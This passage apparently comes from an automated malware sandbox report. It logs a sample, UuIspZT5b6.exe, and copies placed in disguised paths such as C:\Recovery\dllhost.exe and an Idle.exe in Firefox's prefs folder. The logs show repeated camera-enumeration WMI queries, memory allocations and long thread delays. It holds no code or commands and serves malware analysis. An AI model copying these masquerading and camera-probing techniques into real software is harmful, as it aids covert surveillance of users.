                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeMemory allocated: 1490000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeMemory allocated: 1B220000 memory reserve | memory write watchJump to behavior
                          Source: C:\Recovery\dllhost.exeMemory allocated: 3080000 memory reserve | memory write watchJump to behavior
                          Source: C:\Recovery\dllhost.exeMemory allocated: 1B290000 memory reserve | memory write watchJump to behavior
                          Source: C:\Recovery\dllhost.exeMemory allocated: 16B0000 memory reserve | memory write watchJump to behavior
                          Source: C:\Recovery\dllhost.exeMemory allocated: 1B340000 memory reserve | memory write watchJump to behavior
                          Source: C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exeMemory allocated: 25C0000 memory reserve | memory write watch
                          Source: C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exeMemory allocated: 1A790000 memory reserve | memory write watch
                          Source: C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exeMemory allocated: A50000 memory reserve | memory write watch
                          Source: C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exeMemory allocated: 1A440000 memory reserve | memory write watch
                          Source: C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exeMemory allocated: A60000 memory reserve | memory write watch
                          Source: C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exeMemory allocated: 1A540000 memory reserve | memory write watch
                          Source: C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exeMemory allocated: 2700000 memory reserve | memory write watch
                          Source: C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exeMemory allocated: 1A8A0000 memory reserve | memory write watch
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeMemory allocated: 21C0000 memory reserve | memory write watch
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeMemory allocated: 1A460000 memory reserve | memory write watch
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeMemory allocated: 15E0000 memory reserve | memory write watch
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeMemory allocated: 1B2E0000 memory reserve | memory write watch
                          Source: C:\Recovery\dllhost.exeMemory allocated: 1640000 memory reserve | memory write watch
                          Source: C:\Recovery\dllhost.exeMemory allocated: 1B2C0000 memory reserve | memory write watch
                          Source: C:\Recovery\dllhost.exeMemory allocated: 1270000 memory reserve | memory write watch
                          Source: C:\Recovery\dllhost.exeMemory allocated: 1AC80000 memory reserve | memory write watch
                          Source: C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exeMemory allocated: E70000 memory reserve | memory write watch
                          Source: C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exeMemory allocated: 1ACE0000 memory reserve | memory write watch
                          Source: C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exeMemory allocated: CC0000 memory reserve | memory write watch
                          Source: C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exeMemory allocated: 1A820000 memory reserve | memory write watch
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeMemory allocated: 1240000 memory reserve | memory write watch
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeMemory allocated: 1ADE0000 memory reserve | memory write watch
                          Source: C:\Recovery\dllhost.exeMemory allocated: 10A0000 memory reserve | memory write watch
                          Source: C:\Recovery\dllhost.exeMemory allocated: 1AC00000 memory reserve | memory write watch
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Recovery\dllhost.exeThread delayed: delay time: 922337203685477Jump to behavior
